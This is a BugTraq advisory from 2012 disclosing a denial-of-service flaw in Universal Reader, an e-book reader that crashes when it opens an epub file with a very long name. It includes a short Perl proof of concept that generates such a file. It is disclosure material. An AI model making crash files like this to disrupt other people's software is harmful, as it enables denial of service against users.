BugTraq
Universal Reader Filename Denial Of Service Vulnerability May 12 2012 05:44AM
demonalex 163 com
Title: Universal Reader Filename Denial Of Service Vulnerability
Software : Universal Reader

Software Version : 1.16.740.0 (product version: 0.63.538)

Vendor: http://uread.superfection.com/

Vulnerability Published : 2012-05-12

Vulnerability Update Time :

Status :

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
Universal Reader is a online/offline reader for reading polytype e-book files.
Universal Reader contains any denial of service vulnerability about openning long-name files. Success in exploiting this vulnerability will crumble uread.exe process.

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang (at) connect.polyu (dot) hk [email concealed]
Pentester/Researcher
Dark2S Security Team/PolyU.HK

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus